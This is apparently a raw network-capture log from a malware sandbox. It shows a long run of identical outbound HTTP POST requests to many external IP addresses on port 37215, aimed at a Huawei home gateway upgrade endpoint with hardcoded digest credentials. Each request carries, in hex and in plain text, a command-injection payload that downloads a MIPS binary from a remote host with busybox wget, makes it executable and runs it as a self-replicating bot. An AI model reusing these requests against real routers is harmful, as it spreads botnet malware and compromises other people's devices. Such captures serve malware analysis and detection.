2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2017192.168.2.134272881.43.168.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574564934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2018192.168.2.133774641.207.27.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574589014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2019192.168.2.134032280.176.116.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574595928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2020192.168.2.1334288130.211.255.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574610949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2021192.168.2.1354990141.11.118.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574614048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2022192.168.2.133352420.160.226.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574640036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2023192.168.2.1346236157.165.46.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574642897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2024192.168.2.133690041.209.58.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574657917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2025192.168.2.134801041.137.83.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574666977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2026192.168.2.1354056141.175.250.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574687004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2027192.168.2.135256841.119.224.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574698925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
